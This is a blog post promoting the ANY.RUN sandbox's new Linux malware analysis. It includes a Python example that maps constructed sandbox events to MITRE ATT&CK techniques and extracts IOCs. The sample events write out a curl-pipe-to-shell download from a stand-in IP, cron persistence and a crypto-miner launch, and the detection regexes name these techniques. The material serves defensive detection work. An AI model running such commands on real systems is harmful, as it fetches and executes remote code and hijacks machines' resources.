cognitive cybersecurity intelligence


ANY.RUN Sandbox Now Examines Sophisticated Linux Malware

Hello there! You might already know the ANY.RUN sandbox, a cloud-based interactive sandbox where you detonate a sample in an isolated VM and watch what it does. If not, buckle up, fellow cybersecurity practitioners, because there is news from the ever-evolving world of malware analysis.

Recently, ANY.RUN added Linux support to its sandbox, so the same secure, isolated environment analysts have used for investigating Windows malware is now available for Linux samples and threat research. With Linux increasingly targeted by attackers, this addition goes a long way towards strengthening our defensive strategies.

If you're a security analyst, think of this as an extra muscle to flex at threats. The update lets you reproduce and observe malicious behaviour on Linux systems, improving your ability to understand and respond to threats that would not show up in a Windows VM at all.

Now, here's why this matters. Linux is an attractive target: it underpins servers, containers and cloud workloads across organisational IT, and that ubiquity is exactly what draws attackers. Consider this: according to IBM, the number of Linux-related malware families grew by 40% in 2020. And that's not all. A compromised Linux-based cloud platform also hands the attacker substantial compute and network resources, which is a large part of the appeal.

Taking on Linux malware analysis is no small feat. The folks at ANY.RUN understand this, which is why they've extended the platform's Windows sample analysis capabilities to Linux. Because the analysis is interactive, the analyst can work inside the running VM (clicking, typing, launching the sample with specific arguments) instead of waiting for a fixed automated run, which helps surface threats that static signatures do not yet cover.

Their real-time alerts are like a third eye, ensuring no critical event slips under your radar, and their concise post-task reports keep all relevant data within easy reach. There's also the MITRE ATT&CK matrix report, which maps the suspicious behaviours observed in a Linux sandbox task onto ATT&CK tactics and techniques, giving you a ready-made guide to what the sample is actually doing.

By now, you're probably wondering about the nitty-gritty of running a new Linux task on ANY.RUN. It's simple: when you set up a new task, select Linux as the OS from the drop-down menu, and your sample will run on Ubuntu. Pick the OS that matches the sample; an ELF binary or shell script submitted to a Windows VM simply will not execute, and you will learn nothing from the run.

With the new features, you not only get real-time information from the analysis, you also reduce how much deep-dive reverse engineering is needed for triage. The sandbox slices and dices complex Linux malware for you, letting you extract the needed IOCs (contacted hosts and URLs, dropped files, process activity) quickly. The results are readable at a glance, so you can move fast without switching context.
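To make the two report features above concrete, here is an added example (my own code, not ANY.RUN's report format or API) that takes a handful of constructed Linux sandbox process events, maps them onto MITRE ATT&CK techniques the way a matrix report would, and pulls out network IOCs from the same events. The technique IDs are real ATT&CK identifiers; the event shape, the sample commands and the regex heuristics are assumptions made for illustration.

```python
"""Map constructed Linux sandbox process events to MITRE ATT&CK techniques
and extract network IOCs.  Example code, not ANY.RUN's report format."""
import re
from collections import defaultdict

# Constructed sample events as (process name, command line).  This is an
# assumed shape for illustration, not what any real sandbox emits.
SAMPLE_EVENTS = [
    ("bash", "bash -c 'curl -s http://198.51.100.23/x.sh | sh'"),
    ("curl", "curl -s http://198.51.100.23/x.sh"),
    ("sh", "sh -c 'echo \"* * * * * /tmp/.x\" | crontab -'"),
    ("crontab", "crontab -"),
    ("chmod", "chmod +x /tmp/.x"),
    ("/tmp/.x", "/tmp/.x --pool pool.example-mining.net:3333"),
    ("rm", "rm -f /tmp/x.sh"),
]

# (technique id, technique name, tactic, regex over the command line).
# IDs and names are real ATT&CK entries; the regexes are illustrative
# heuristics only.  Where ATT&CK lists a technique under several tactics
# (cron is Execution, Persistence and Privilege Escalation) one is chosen.
RULES = [
    ("T1059.004", "Command and Scripting Interpreter: Unix Shell",
     "Execution", r"^(ba)?sh\s+-c\b"),
    ("T1105", "Ingress Tool Transfer",
     "Command and Control", r"^(curl|wget)\b.*https?://"),
    ("T1053.003", "Scheduled Task/Job: Cron",
     "Persistence", r"\bcrontab\b|/etc/cron"),
    ("T1222.002", "File and Directory Permissions Modification: Linux and Mac",
     "Defense Evasion", r"^chmod\b.*\+x"),
    ("T1070.004", "Indicator Removal: File Deletion",
     "Defense Evasion", r"^rm\s+(-\w+\s+)*/tmp/"),
    ("T1496", "Resource Hijacking",
     "Impact", r"--pool\b|stratum\+tcp://"),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s'\"]+")
HOSTPORT = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+):(\d{2,5})\b", re.I)


def map_to_attack(events):
    """Return {technique_id: {name, tactic, evidence:[cmdlines]}} for every
    rule that fires on at least one event."""
    hits = {}
    for _, cmdline in events:
        for tid, name, tactic, pattern in RULES:
            if re.search(pattern, cmdline):
                entry = hits.setdefault(
                    tid, {"name": name, "tactic": tactic, "evidence": []})
                entry["evidence"].append(cmdline)
    return hits


def matrix_summary(hits):
    """Group fired techniques by tactic, the view an ATT&CK matrix gives."""
    by_tactic = defaultdict(list)
    for tid, info in hits.items():
        by_tactic[info["tactic"]].append(tid)
    return {tactic: sorted(ids) for tactic, ids in sorted(by_tactic.items())}


def extract_iocs(events):
    """Collect URLs, IPv4 addresses and host:port pairs seen on command lines."""
    iocs = {"ips": set(), "urls": set(), "hosts": set()}
    for _, cmdline in events:
        iocs["urls"].update(URL.findall(cmdline))
        iocs["ips"].update(IPV4.findall(cmdline))
        for host, port in HOSTPORT.findall(cmdline):
            iocs["hosts"].add(f"{host}:{port}")
    return {key: sorted(values) for key, values in iocs.items()}


if __name__ == "__main__":
    hits = map_to_attack(SAMPLE_EVENTS)
    for tactic, ids in matrix_summary(hits).items():
        print(tactic)
        for tid in ids:
            print(f"  {tid}  {hits[tid]['name']}  ({len(hits[tid]['evidence'])} events)")
    print(extract_iocs(SAMPLE_EVENTS))
```

The point of the exercise is the separation of concerns a sandbox report gives you: the behaviour mapping tells you *what kind* of threat you are looking at (download, cron persistence, miner), while the IOC list is what you push straight into blocklists and hunting queries. Real reports also carry file hashes and dropped-file paths; those are left out here because the constructed events have none.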

And here’s the cherry on top, it’s both efficient and wallet-friendly. With preconfigured Linux virtual machines (VMs) that gather IOCs, you can skip the weeks of infrastructure setup time.

So, all you folks running Linux, cloud hosts and desktop users alike, take heed that your systems are a prime target. A well-maintained Linux host is a harder target than many, but malware still finds its way in. Fret not, though: we now have smarter ways to study it and keep the threats at bay.

Just remember, as long as there is malware, our mission continues. And with advanced tools like ANY.RUN, we’re more equipped than ever to investigate incidents and streamline threat analysis. As the saying goes, knowledge is power!

by Morgan Phisher | HEAL Security
